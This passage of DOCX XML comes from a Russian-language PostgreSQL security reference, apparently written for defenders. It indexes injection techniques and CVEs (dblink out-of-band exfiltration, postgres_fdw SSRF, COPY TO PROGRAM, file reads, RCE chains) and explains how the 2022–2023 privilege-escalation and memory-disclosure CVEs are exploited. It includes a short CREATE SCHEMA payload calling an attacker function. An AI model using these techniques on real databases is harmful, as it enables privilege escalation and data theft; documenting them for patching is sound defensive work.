          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: «как эта инъекция работает». Раздел 4 — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">хронологический индекс по дате релиза</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: «когда что починили». Один и тот же CVE появляется в обоих местах с разной оптикой. Например, CVE-2024-10976 (R9):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Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3.17.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — как RLS-обход через subquery/CTE+plan-cache: уязвимый код, payload, что атакующий видит в логах;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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">4.4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — как часть batch-релиза 14.11.2024 вместе с тремя другими CVE: одна-две строки про суть + cross-ref на 3.17.1.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Граница с 6.2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Таблица 6.2 — тот же набор CVE, но в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">табличном индексе</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для поиска по CVE-ID или R#. Без описаний механики и без хронологии batch-ов. Используется как lookup, не для чтения подряд.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Инвентаризация R1–R28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 / pattern</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 3.X.N</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Краткое название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(feature)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OOB exfil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dblink_connect через user/dbname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(feature)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SSRF</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postgres_fdw как SSRF</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CVE-2019-9193 (disputed)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COPY FROM/TO PROGRAM</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(feature)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file-read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3.6.3 / 3.6.4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pg_read_server_files / lo_import</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(feature)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filter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Dollar-quoted strings $$...$$</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chain (psql)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psql UTF-8 SQL injection (CVSS 8.1)</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PL/Perl env hijack</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auth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 / 3.17.3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reset на неверный user ID</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игнорирует user ID в subquery</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trust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(полная карточка 4.4)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libpq MITM error injection</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CVE-2023-39418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MERGE не применяет UPDATE/SELECT policy</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CVE-2023-2454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schema_element обходит search_path</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memory corruption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(полная карточка 4.3)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array integer overflow → ACE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(полная карточка 4.3)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aggregate unknown-type memory leak</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CVE-2022-1552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autovacuum/REINDEX без SRO sandbox</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CVE-2022-2625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Extension scripts подменяют объекты</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CVE-2024-4317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pg_stats_ext most_common_vals leak</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(pattern)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identifier injection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format('%s') vs format('%I')</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(pattern)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error-based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Error-based через CAST </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">::int</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">::regclass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(driver behavior)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multi-statement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Stacked queries по wire-protocol</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 chain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chain</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3.9.7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psql injection → COPY TO PROGRAM</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(feature)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smuggle write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CTE с INSERT/UPDATE/DELETE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CVE-2025-12817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(полная карточка 4.5)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STATISTICS без CREATE privilege</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CVE-2025-13780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adjacent RCE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(полная карточка 4.5)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pgAdmin restore regex bypass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dump/restore SQLi</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Newline в object names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Optimizer stats bypass view ACL/RLS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CVE-2025-4207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(полная карточка 4.5)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GB18030 buffer over-read</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(feature)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 enabler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2.3 / 3.13.5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Trusted extensions (PG13+)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Группировка по типу карточки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Якорь в 3.X.N → краткая запись здесь</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: R1, R2, R3, R4, R5, R6, R7, R8, R9, R11, R12, R15, R16, R17, R18, R19, R20, R21, R22, R25, R26, R28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Полная карточка в разделе 4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: R10 (4.4), R13 (4.3), R14 (4.3), R23 (4.5), R24 (4.5), R27 (4.5)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Эти шесть CVE не получили якоря в 3.X.N, потому что их класс уязвимости не вписывается в принятое определение SQL-инъекции: R13 / R14 / R27 — memory-corruption и memory-disclosure через ошибки bounds-checking в C-коде; R10 — trust bypass в libpq до завершения handshake; R23 — DoS через name-squatting в чужой схеме; R24 — RCE в pgAdmin (adjacent ecosystem, не сам PostgreSQL). Все они важны для compliance и patch-management, поэтому собраны в разделе 4.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Карта подразделов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4.2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Хронология 2022 — R15, R16 (privilege escalation pre-RLS-era)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4.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Хронология 2023 — R11, R12, R13, R14 (RLS + memory disclosure + memory corruption)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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Хронология 2024 — R7, R8, R9, R10, R17 (batch 14.11.2024 + ранее R17)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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Хронология 2025 — R6, R21, R23, R24, R25, R26, R27 (несколько batch-ов в году)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4.6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Версионная таблица — master-таблица «minor × CVE» для defenders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4.7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Цепочки — R6→R21, R8+R9, R16→R7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4.8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Информационные CVE — группировка low-severity / DoS / disclosure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4.9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Managed-провайдеры — patch policy и provider-specific quirks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">4.2 Хронология 2022</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Два CVE 2022 года, оба про privilege escalation в pre-RLS-era. Один — autovacuum/REINDEX без SRO sandbox, второй — extension scripts. Оба фиксированы в minor-релизах 2022 года, но остаются актуальны для legacy-кластеров.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-2022-1552 — autovacuum/REINDEX без SRO sandbox</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Атакующий с правом CREATE на любой схеме создаёт таблицу с index expression, ссылающимся на свою функцию. Когда superuser выполняет </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ANALYZE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REINDEX</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CLUSTER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REFRESH MATERIALIZED VIEW</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pg_amcheck</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (или это делает autovacuum), функция выполняется без security-restricted operation sandbox в контексте superuser, что даёт arbitrary SQL под superuser-привилегиями.</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14.2, 13.6, 12.10, 11.15, 10.20.</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14.3, 13.7, 12.11, 11.16, 10.21 (12.05.2022). CVSS 8.8 (High).</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3.13.3.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-2022-2625 — extension scripts подмена объектов</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Атакующий с CREATE в схеме создаёт объект (функция, оператор) с именем, которое extension script собирается создать через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE OR REPLACE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. После </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE EXTENSION ...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> объект «забирается» в extension от имени запускающего admin/superuser, но фактическое тело остаётся attacker-controlled. Последующее обращение к объекту victim-ом (admin / другие пользователи) выполняет код атакующего в их контексте.</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14.4, 13.7, 12.11, 11.16, 10.21.</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14.5, 13.8, 12.12, 11.17, 10.22 (11.08.2022). CVSS 8.0 (High).</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3.13.4.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Цепочка R16 → R7:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> extension hijack → plperl env-hijack RCE через CVE-2024-10979 — даже после R16 patch на upgrade-нутом cluster-е, если подменённый объект уже существует. Подробный разбор — в 4.7.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Контекст 2022 года</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">В 2022 году PostgreSQL 15 ещё не вышел (релиз 13.10.2022), поэтому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schema по умолчанию доступна для CREATE всем ролям с правом PUBLIC. CVE-2018-1058 (классический </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">array_to_string</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> trojan через search_path) остаётся актуальным, и оба CVE 2022 года продолжают тот же тренд — privilege escalation через объекты-приманки в общедоступных schema. CVE-2022-1552 и CVE-2022-2625 — финальные patches до структурных изменений в PG 15, который закрыл CREATE на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для PUBLIC на новых кластерах (но не на upgrade-нутых — см. 2.4).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">4.3 Хронология 2023</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Четыре CVE 2023 года: два по privilege escalation/RLS (R11, R12) и два по memory (R13, R14). R11/R12 имеют якоря в 3.X.N и подаются краткими записями. R13 (array integer overflow → ACE) и R14 (memory disclosure через aggregate) не вошли в 3.X.N — это memory-corruption класс — поэтому получают полные карточки здесь.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-2023-2454 — schema_element обходит protective search_path</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SCHEMA atk CREATE TABLE x (c int DEFAULT atk.evil())</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — schema_element с user-defined функцией. Protective </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">search_path = pg_catalog</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> не помогает, потому что schema_element ссылается на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">atk.evil</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> напрямую через полное имя. Когда admin / superuser обращается к schema, функция выполняется в его контексте → произвольный SQL под bootstrap superuser.</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15.2, 14.7, 13.10, 12.14, 11.19.</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15.3, 14.8, 13.11, 12.15, 11.20 (11.05.2023). CVSS 7.5 (High per PostgreSQL Project).</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3.13.2.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-2023-39418 — MERGE не применяет UPDATE/SELECT RLS</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В PG 15.0–15.3 statement </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">MERGE INTO t USING src ...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> не триггерил применение UPDATE и SELECT RLS-policies к строкам перед записью. Если UPDATE-policy запрещает строку, а INSERT-policy — нет, через MERGE её можно вписать в обход политики. Узкое окно: MERGE появился в PG 15.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Затронуто:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> только PG 15.0, 15.1, 15.2, 15.3.</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15.4 (10.08.2023). CVSS 3.1 (Low).</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3.17.2.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-2023-5868 — memory disclosure через aggregate с unknown-type (полная карточка)</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В aggregate-функциях </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">string_agg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array_agg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> и нескольких других, когда аргумент имеет тип </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">unknown</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (строковый литерал без явного cast-а), processing читает байты от конца отведённого буфера до следующего NUL-byte и включает их в результат. Класс — information disclosure через uninitialized memory leak; не классическая SQL-инъекция, но эксплуатируется через SQL без особых привилегий.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
